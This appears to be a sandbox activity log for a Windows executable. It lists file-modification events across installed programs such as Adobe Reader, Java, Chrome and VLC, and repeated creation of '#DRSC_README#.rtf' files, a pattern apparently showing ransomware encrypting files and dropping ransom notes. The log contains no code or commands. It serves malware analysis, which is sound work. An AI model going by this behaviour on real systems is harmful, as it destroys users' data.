710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\LICENSE 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\duplicate.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ja.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview_selected.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\ext\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_hover_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_ellipses-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\adc_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\locale\updater_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_de.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\add-comment-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Info2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\psfont.properties.ja 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\classfile_constants.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\omni.ja 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\load-typekit.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\elevation_service.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jsse.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_delete_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\sound.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbUpOutline_22_N1.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\versions\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\altDekstopCopyPasteHelper.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\sat_logo_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-masterfs-nio2.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\logo_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\LICENSE 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_checkbox_selected_18.svg 